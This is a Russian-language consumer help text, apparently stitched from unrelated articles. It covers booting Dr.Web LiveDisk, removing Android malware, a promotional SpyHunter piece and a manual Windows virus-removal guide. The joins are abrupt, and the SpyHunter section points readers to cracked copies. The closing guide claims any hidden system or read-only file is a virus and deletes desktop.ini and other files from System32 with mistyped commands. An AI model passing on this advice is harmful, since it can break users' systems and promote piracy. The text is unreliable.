    Мы с вами скачали и установили на флешку антивирус с самыми последними антивирусными базами. Это означает, что если вы захотите воспользоваться этой флешкой через некоторое время, то антивирусные базы на ней уже устареют.

    Есть возможность обновить антивирусные базы без создания новой флешки, но я обычно так не поступаю. Дело в том, что подобные проблемные ситуации с вирусами у меня возникают довольно редко и мне проще заново создать загрузочную флешку с антивирусом, нежели отвести отдельную флешку под эти цели и в случае необходимости обновлять на ней антивирусные базы.

    Как проверить компьютер на вирусы

    Итак, флешка готова. Перезагружаем компьютер и запускаемся с флешки.

    Для этого можно воспользоваться меню загрузки (Boot Menu). У разных производителей материнских плат и ноутбуков это меню вызывается нажатием разных кнопок на клавиатуре, но обычно это либо клавиша Esc, либо одна из функциональных клавиш — F9, F11, F12. Самый верный способ узнать, какая клавиша в вашем случае вызывает меню загрузки — это обратиться к инструкции от вашего ноутбука или материнской платы. Ну или еще проще — спросить у Яндекса. Для этого так и сформулируем поисковый запрос, например, «меню загрузки клавиша ноутбук asus».

    Данную клавишу нужно нажимать сразу же после включения компьютера. Обычно я клавишу не удерживаю, а просто быстро и многократно нажимаю ее до появления меню.

    В меню выбираем флешку и начинается процесс загрузки.

    По умолчанию установлен английский язык интерфейса, но мы можем исправить ситуацию, переключившись на русский, нажав клавишу F2 и выбрав язык.

    Для выбора языка можно воспользоваться клавишами управления курсором — стрелками вверх и вниз. Для подтверждения выбора нажимаем клавишу ENTER.

    Данная флешка является комплексным решением для устранения разного рода проблем, поэтому здесь есть, например, утилита для тестирования памяти компьютера, которую можно запустить прямо сейчас. Но я с помощью стрелок выбираю Dr.Web LiveDisk и нажимаю клавишу ENTER.

    Будет загружена операционная система Linux и сразу же запустится антивирусный сканер Dr.Web CureIt! Точно такой же сканер можно скачать и запустить из под Windows, но, как я уже сказал ранее, намного правильнее и эффективнее работать с флешки, нежели из под загруженной с жесткого диска операционной системы, поэтому приступим.

    Можно начать быструю или задать выборочную проверку, в которой указать те объекты и области на диске, которые вы хотите проверить.

    Я запущу быструю, нажатием кнопки «Начать проверку».

    После завершения проверки мы получим информацию об обнаруженных угрозах и сможем их обезвредить, выбрав наиболее подходящее действие — выбираем объекты и нажимаем на кнопку «Обезвредить».

    Это был самый простой и наиболее быстрый подход к удалению вирусов с компьютера.

    Утилита Dr.Web CureIt! имеет настройки и при желании вы можете с ними ознакомиться в инструкции, ссылку на которую я уже дал выше.

    Ну а сама флешка Dr.Web LiveDisk – это, как я уже упомянул, не просто антивирусный сканер, а целый набор утилит, предназначенных для восстановления работоспособности компьютера и его частичной диагностики. Здесь вы можете не только удалять вирусы, но и редактировать реестр Windows или работать с файлами и папками на вашем жестком диске. Также здесь есть браузер, с помощью которого вы можете получить нужную вам информацию из интернета.

    Подобная флешка неоднократно меня выручала и помогла восстановить не один компьютер…

    Отчего ваш мобильный телефон вдруг начал вести себя не так, как обычно, или вообще «зажил» своей «жизнью»? Возможно, оттого, что в нем поселилась вредоносная программа. Сегодня количество вирусов и троянов для Андроид растет в геометрической прогрессии. Почему? Да потому, что ушлые ребята-вирусописатели знают, что смартфоны и планшеты всё чаще используются нашими согражданами в качестве электронных кошельков, и делают всё, чтобы переместить средства со счетов владельцев в свой карман. Давайте поговорим о том, как понять, что мобильное устройство подхватило инфекцию, как удалить вирус с Андроида и обезопасить себя от повторных заражений.

    Симптомы вирусного заражения Android-устройства

    • Гаджет включается дольше, чем обычно, тормозит или внезапно перезагружается.
    • В истории SMS и телефонных звонков есть исходящие сообщения и вызовы, которых вы не совершали.
    • Со счета вашего телефона сами по себе списываются деньги.
    • На рабочем столе или в браузере отображается реклама, не связанная с каким-либо приложением или сайтом.
    • Сами по себе устанавливаются программы, включается Wi-Fi, Bluetooth или камера.
    • Пропал доступ к электронным кошелькам, мобильному банку или по неизвестным причинам уменьшилась сумма на счетах.
    • Кто-то завладел вашим аккаунтом в социальных сетях или мессенджерах (если используются на мобильном устройстве).
    • Гаджет заблокирован, а на экране отображается сообщение, что вы что-то нарушили и должны заплатить штраф или просто перевести кому-то деньги за разблокировку.
    • Внезапно перестали запускаться приложения, пропал доступ к папкам и файлам, заблокировались какие-либо функции устройства (например, не нажимаются кнопки).
    • При запуске программ выскакивают сообщения, вроде «в приложении com.android.systemUI произошла ошибка».
    • В списке приложений появились неизвестные иконки, а в диспетчере задач — неизвестные процессы.
    • Антивирусная программа информирует вас об обнаружении вредоносных объектов.
    • Антивирусная программа самопроизвольно удалилась с устройства или не запускается.
    • Батарея телефона или планшета стала разряжаться быстрее, чем всегда.

    Не все из этих симптомов стопроцентно указывают на вирус, но каждый является поводом немедленно просканировать устройство на предмет заражения.

    Самый простой способ удаления мобильного вируса

    Если гаджет сохранил работоспособность, проще всего убрать вирус с помощью установленного на Android антивируса. Запустите полное сканирование флеш-памяти телефона, при обнаружении вредоносного объекта выберите опцию «Удалить», сохранив обезвреженную копию в карантине (на случай, если антивирус обознался и принял за вирус что-то безопасное).

    К сожалению, этот способ помогает примерно в 30-40% случаев, поскольку большинство вредоносных объектов активно сопротивляется своему удалению. Но управа существует и на них. Далее мы рассмотрим варианты действий, когда:

    • антивирус не запускается, не обнаруживает или не удаляет источник проблемы;
    • вредоносная программа после удаления восстанавливается;
    • устройство (или его отдельные функции) заблокированы.

    Удаление вредоносной программы в безопасном режиме

    Если вам не удается почистить телефон или планшет в обычном режиме, попытайтесь это сделать в безопасном. Основная масса вредоносных программ (не только мобильных) не проявляет в безопасном режиме никакой активности и не препятствует уничтожению.

    Для загрузки устройства в безопасном режиме нажмите кнопку включения/выключения, установите палец на «Отключить питание» и держите его до тех пор, пока не появится сообщение «Переход в безопасный режим». После этого нажмите ОК.

    Если у вас старая версия Android — 4.0 и ниже, выключите гаджет обычным способом и снова включите. При появлении на экране логотипа Android одновременно нажмите клавиши увеличения и уменьшения громкости. Удерживайте их, пока аппарат не загрузится полностью.

    Находясь в безопасном режиме, просканируйте устройство антивирусом. Если антивируса нет или он по каким-то причинам не запускается, установите (или переустановите) его из Google Play.

    Таким способом успешно удаляются рекламные вирусы типа Android.Gmobi 1 и Android.Gmobi.3 (по классификации Dr. Web), которые закачивают на телефон различные программы (с целью накрутки рейтинга), а также показывают на рабочем столе баннеры и объявления.

    Если у вас есть права суперпользователя (root) и вы точно знаете, что именно вызвало проблему, запустите файловый менеджер (например, Root explorer), пройдите по пути расположения этого файла и удалите его. Чаще всего мобильные вирусы и трояны помещают свое тело (исполняемые файлы с расширением.apk) в каталог system/app.

    Для перехода в нормальный режим просто перезагрузите устройство.

    Удаление мобильных вирусов через компьютер

    Удаление вирусов на телефоне через компьютер выручает тогда, когда мобильный антивирус не справляется со своей задачей даже в безопасном режиме или функции устройства частично заблокированы.

    Удалить вирус с планшета и телефона, используя компьютер, тоже возможно двумя способами:

    • с помощью антивируса, установленного на ПК;
    • вручную через файловый менеджер для Андроид-гаджетов, например, Android Commander.

    Используем антивирус на компьютере

    Для проверки файлов мобильного устройства антивирусом, установленным на компьютере, подключите телефон или планшет к ПК USB-кабелем, выбрав способ «Как USB-накопитель».

    Следом включите USB.

    После этого в папке «Компьютер» на ПК появятся 2 дополнительных «диска» — внутренняя память телефона и SD-карта. Для запуска сканирования откройте контекстное меню каждого диска и кликните «Проверить на вирусы».

    Удаляем зловреда через Android Commander

    Android Commander — программа для обмена файлами между мобильным андроид-гаджетом и ПК. Запускаясь на компьютере, она предоставляет владельцу доступ к памяти планшета или телефона, позволяет копировать, перемещать и удалять любые данные.

    Для полноценного доступа ко всему содержимому андроид-гаджета необходимо заранее получить root-права и включить отладку по USB. Последняя активируется через сервисное приложение «Параметры» — «Система» — «Параметры разработчика».

    Далее подключите гаджет к ПК как USB-накопитель и запустите с правами администратора Android Commander. В нем, в отличие от проводника Windows, отображаются защищенные системные файлы и каталоги ОС Андроид — так же, как, например, в Root Explorer — диспетчере файлов для root-пользователей.

    В правой половине окна Android Commander показаны каталоги мобильного устройства. Найдите в них исполняемый файл приложения (с расширением.apk), которое вызывает проблему, и удалите его. Как вариант — скопируйте подозрительные папки с телефона на компьютер и просканируйте каждую из них антивирусом.

    Что делать, если вирус не удаляется

    Если вышеописанные операции ни к чему не привели — вредоносная программа по-прежнему дает о себе знать, а также если операционная система после очистки перестала нормально функционировать, придется прибегнуть к одной из радикальных мер:

    • сбросу с восстановлением заводских настроек через системное меню;
    • hard reset через меню Recovery;
    • перепрошивке аппарата.

    Любой из этих способов приведет устройство к состоянию как после покупки — на нем не останется никаких пользовательских программ, личных настроек, файлов и другой информации (данных об SMS, звонках и т. п.). Также будет удалена ваша учетная запись Google. Поэтому если есть возможность, перенесите телефонную книгу на SIM-карту и скопируйте платные приложения и другие ценные объекты на внешние носители. Желательно сделать это вручную — без использования специальных программ, чтобы случайно не скопировать вирус. После этого приступайте к «лечению».

    Восстанавливаем заводские настройки через системное меню

    Этот вариант самый простой. Им можно воспользоваться тогда, когда функции операционной системы и сам аппарат не заблокированы.

    Зайдите в приложение «Параметры», откройте раздел «Личные» — «Резервное копирование» и выберите «Сброс с восстановлением заводских настроек».

    Hard reset через Recovery-меню

    «Жесткий» сброс настроек поможет справиться со зловредом, если он не удаляется ни одним из перечисленных способов или заблокировал вход в систему. К нашей радости, доступ к меню Recovery (восстановления системы) при этом сохраняется.

    Вход в Recovery на разных телефонах и планшетах осуществляется по-своему. На одних для этого нужно удерживать при включении клавишу «Громкость+», на других — «Громкость-«, на третьих — нажать специальную утопленную кнопку и т. д. Точная информация содержится в инструкции к аппарату.

    В меню Recovery выбираем опцию «wipe data/factory reset» либо просто «factory reset».

    Перепрошивка

    Перепрошивка — это по сути переустановка ОС Андроид, такая же крайняя мера, как переустановка Windows на компьютере. К ней прибегают в исключительных случаях, например, когда некий китайский вирус внедрен непосредственно в прошивку и обитает на устройстве с момента его «рождения». Одним их таких вредоносов является шпионская программа android spy 128 origin.

    Для перепрошивки телефона или планшета потребуются root-права, дистрибутив (сама прошивка), программа инсталляции, компьютер с USB-кабелем или SD-карта. Помните, что для каждой модели гаджета выпускаются свои, индивидуальные версии прошивок. Вместе с ними обычно находятся и инструкции по установке.

    Как избежать вирусного заражения Android-устройств

    • Устанавливайте мобильные приложения только из проверенных источников, откажитесь от взломанных программ.
    • Обновляйте устройство по мере выпуска апдейтов системы — в них разработчики закрывают уязвимости, которые используют вирусы и трояны.
    • Установите мобильный антивирус и держите его всегда включенным.
    • Если гаджет служит вам кошельком, не позволяйте другим людям выходить с него в Интернет или открывать на нем непроверенные файлы.

    Удалить вирус с компьютера не так сложно, как зачастую расписывают тысячи людей. Все вирусы – это хорошо продуманные алгоритмы технических действий. А это значит и вылечить любую вредоносную программу можно применив такой же правильный алгоритм, но уже с обратным эффектом.

    А для вашего удобства, как впрочем и всегда, предлагаю ознакомиться с содержанием статьи и сразу перейти к интересующей вас главе. Удачи!

    Программа SpyHunter спасет вас в таких ситуациях.

    На просторах интернета огромное количество программ шпионов, троянов которые могут «прицепляться» к вашему компьютеру во время просмотра какой-либо информации. Цель таких приложений любым способом попасть в систему, подменить некоторые из файлов в вашем ПК. После успешной установки вирус начинает атаку системы. Проявляется это множеством разных ситуаций, но лучшие из вредоносов ведут свою деятельность абсолютно незаметно.

    При этом вы ежедневно пользуетесь компьютером ни о чем не подозревая вводите логины и пароли для входа на любимые сайты или почту. А тем временем вирус работает и каждый день отправляет своему хозяину отчеты о ваших сессиях в интернете. Внимательно фильтрует информацию и отправляет все сохраненные и просто введенные пароли.

    Так обычные пользователи теряют доступ к своим страницам в соц. сетях, работяги теряют свою почту. К тому же очень часто люди привязывают одну и туже почту ко всем своим аккаунтам и взломщик, получив к ней доступ, просто запрашивает восстановление пароля на нее от всех ваших страниц и забирает все к чему «привязана» данная почта.

    Ну так вот, программа Спайхантер без особого труда вычислит таких вредителей и поможет вам от них избавиться. Но это далеко не все, что может это приложение.

    Вы когда-нибудь сталкивались с рекламой в интернете, а точнее с рекламой в ваших браузерах? Я имею в виду не безобидную рекламу, которая обычно расположена по краям сайтов и где-то просто напрягает, но в целом не наносит вреда. А именно ту рекламу, которая вылетает при первом же открытии браузера и закрыть ее не получается, она открывается на всех сайтах без разбора и переустановка браузера совсем не мешает ей появляться вновь и вновь. Дочитав статью, вы сможете самостоятельно избавляться от такой рекламы раз и навсегда.

    Впрочем, разновидностей вирусных атак очень много, защитить себя от всех наверное невозможно, но проявляя максимум внимания к безопасности вы сможете сократить вероятность попадания на ваш компьютер ненужной дряни.

    Я думаю, суть вы уловили и готовы перейти к практическому решению проблем безопасности. Для этого просто продолжайте читать, все будет более чем понятно буквально через несколько минут.

    Удаление вирусов вручную или автоматически

    Справедливости ради, сразу хочу сказать, что хороший, надежный продукт не бывает бесплатным и официально данная программа предоставляет свое использование по двум алгоритмам.

    В первом случае, он же бесплатный, создатели предоставили возможность обнаружения всех подозрительных и вредных программ в вашем компьютере, но после обнаружения кнопка «удалить угрозы» будет недоступна и вам придется смотреть, где находится проблема, заходить и вручную удалять вредные файлы. В принципе все справедливо, хотите бесплатно, возитесь и удаляйте все сами, а программа просто укажет где «сидит» вирус. При этом стоит понимать, что интернет могучая система и в ней вы всегда сможете найти уже взломанную версию программы, с полностью доступным функционалом.

    Во втором случае, он же платный, вам необходимо оплатить лицензию на использование данной программы, решите, что для вас важнее удобство и время или экономия денег.

    Но я дам вам возможность установить программу с полным функционалом совершенно бесплатно, для этого посмотрите видео в конце статьи, там я все покажу и расскажу. А пока вы думаете, переходим к следующему этапу.

    Установка программы SpyHunter

    Заходим на сайт программы spyhunter-4.com/ru/ адрес сайта может немного меняться из-за версии программы. Для установки ищем кнопку загрузки, на момент написания статьи она выглядела вот так:

    После загрузки устанавливаем программу, если у вас возникли с этим трудности, просто пролистайте статью до конца, там есть видео инструкция по установке и использованию, там же вы сможете посмотреть, как сделать программу полностью бесплатной и с полным функционалом. После наглядного обзора проблем у вас точно не возникнет.

    Инструкция по использованию:

    После запуска программы вам необходимо только запустить процесс проверки, подождать некоторое время, сразу хочу сказать, иногда проверка может длиться несколько часов, зависит от объема информации на компьютере и мощности вашего ПК. Если смотреть в самой программе, то выглядит это вот так: Открываете вкладку «Начать новое сканирование», снимаем галочку быстрое сканирование и нажимаем кнопку плей. Смотрим на картинке наглядно.

    Галочку быстрое сканирование снимаем не просто так. Делается это для достижения максимального эффекта, поэтому не забываем строго выполнять инструкцию, чтобы потом не писать злостных комментариев, что у вас не получается самостоятельно справиться.

    Вот так будет проходить процесс проверки:

    А вот так будут выглядеть угрозы, если конечно такие у вас есть:

    В конце сканирования вы увидите результат, где указанно количество угроз и кнопка обезвредить угрозы, вот так выглядит:

    В программе SpyHunter есть возможность добавить какие-либо программы в список исключений, чтобы их не цепляло приложением, как не доверительные. Обычно такой эффект бывает на программы, которые вы используете без лицензии (взломанные, крякнутые, неизвестные). Сам раздел исключений смотрите на картинке:

    Если быть более корректным, то тут будут отображаться те программы, которые вы сами разрешаете пропускать во время проверки. Будьте внимательны и пропускайте только те программы, в надежности которых вы уверены минимум на 99%

    Еще полезная категория, «охранники системы» в ней вы сможете посмотреть, что делает программа, какие файлы она признала опасными и заблокировала, а какие просканировала и решила, что они безопасные. Можно сказать это небольшой отчет, для вашего личного анализа и принятия дальнейших решений, выглядит вот так:

    Функция охраны системы должна быть всегда включена, чтобы избежать заражения и выхода из-под контроля заблокированных программ. Надеюсь, свои мысли я донес вам максимально просто и с пользой, жду ваших комментариев, мне всегда интересно узнать получилась статья хорошей или это всего лишь набор бесполезного текста для вас. Задавайте свои вопросы и не стесняйтесь, вместе сможем разобраться со всеми ситуациями в разы быстрее, удачи друзья!

    Видео: Как удалить вирус с компьютера?

    Не забывайте оставлять свое мнение в комментариях, только так мы сможем оценить универсальность метода удаления вирусов.

    без использования каких-либо программ — антивирусов

    Здесь мы покажем вам, как можно самостоятельно обнаружить и затем удалить файлы, способные нанести вред вашему компьютеру, или вирусы самостоятельно (вручную) без использования каких-либо антивирусных программ.

    Это несложно . Давайте начнём!

    Как удалить вирус самостоятельно

    Действовать необходимо на правах администратора.

    Для начала надо открыть командную строку. Для этого нажмите сочетание клавиш WINDOWS + R и в появившемся окне в строке введите cmd и нажмите ОК .

    Команда cmd в командной строке

    Либо, нажав кнопку Пуск в нижнем левом углу экрана монитора, в строке поиска начните набирать «командная строка », а затем по найденному результату кликните правой кнопкой мышки и выберите «Запуск от имени администратора ».

    Вызов командной строки через поиск

    Запуск командной строки от имени администратора

    Кратко о том, какие цели у наших будущих действий:

    С помощью команды attrib нужно найти такие файлы, которые не должны находиться среди системных файлов и потому могут быть подозрительными.

    Вообще, в C: / drive не должно содержаться никаких .exe или .inf файлов. И в папке C:\Windows\System32 также не должны содержаться какие-либо, кроме системных, скрытые или только для чтения файлы с атрибутами i, e S H R .

    Итак, начнём ручной поиск подозрительных, файлов, то есть вероятных вирусов, самостоятельно, без использования специальных программ.

    Откройте командную строку и вставьте cmd . Запустите этот файл от имени администратора.

    Открываем cmd

    Прописываем в строке cd/ для доступа к диску. Затем вводим команду attrib . После каждой команды не забываем нажимать ENTER:

    Команда attrib в командной строке

    Как видим из последнего рисунка, файлов с расширениями .exe или .inf не обнаружено.

    А вот пример с обнаруженными подозрительными файлами:

    Вирусы в системе Windows

    Диск С не содержит никаких файлов .еxе и. inf , пока вы не загрузите эти файлы вручную сами . Если вы найдёте какой-либо файл, подобный тем, которые мы нашли, и он отобразит S H R , тогда это может быть вирус .

    Здесь обнаружились 2 таких файла:

    autorun. inf

    sscv.exe

    Эти файлы имеют расширения .еxе и. inf и имеют атрибуты S H R . Значит, эти файлы могут быть вирусами .

    Теперь наберите attrib -s -h -г -а -i filename. extension . Или в нашем примере это:

    attrib — s — h — г — а -i autorun. inf

    Эта команда изменит их свойства, сделав из них обычные файлы. Дальше их можно будет удалить.

    Для удаления этих файлов введите del filename. extension или в нашем случае:

    del autorun.inf

    То же самое надо проделать со вторым файлом:

    Удаление вирусов вручную

    Теперь перейдём к папке System32.

    Впишите cd win* и нажмите ENTER.

    Снова введите s ystem32. Нажмите ENTER.

    Затем впишите команду attrib . Нажмите ENTER.

    Появился вот такой длинный список:

    Снова вводим внизу команду attrib , не забывая нажать потом ENTER :

    И находим вот такие файлы:

    Подозрительные файлы в папке Windows

    При перемещении вверх-вниз экран перемещается очень быстро, поэтому когда мелькнёт что-то новое, приостановитесь и вернитесь назад‚ чтобы проверить каждый файл, не пропустив ни одного.

    Подозрительные файлы в папке Windows

    Выписываем себе все найденные S H R файлы :

    1. atr. inf
    2. dcr. exe
    3. desktop. ini
    4. idsev.exe

    Выполните команду attrib 3 или 4 раза, чтобы убедиться, что вы проверили всё.

    Ну, вот. Мы самостоятельно нашли целых 4 вредоносных файла! Теперь нам нужно удалить эти 4 вируса.

    C:\Windows\System32>attrib -s -h -r -a -i atr.inf

    C:\Windows\System32>del atr.inf

    C:\Windows\System32>attrib -s -h -r -a -i dcr.exe

    C:\Windows\System32>del dcr.exe

    C:\Windows\System32>attrih -s -h -r -a -i desktop.ini

    C:\Windows\\System32>del desktop.ini

    C:\Windows\System32>attrib -s -h -r -a -i idsev.exe

    C:\Windows\System32>del idsev.exe

    Удаляем вирусы с компьютера самостоятельно

    Аналогичную операцию надо провести с другими папками, вложенными в каталог Windows.

    Нужно просканировать ещё несколько таких каталогов, как Appdata и Temp . Используйте команду attrib , как показано в этой статье, и удалите все файлы с атрибутами S H R, которые не имеют отношения к системным файлам и могут заразить ваш компьютер.

    Поделиться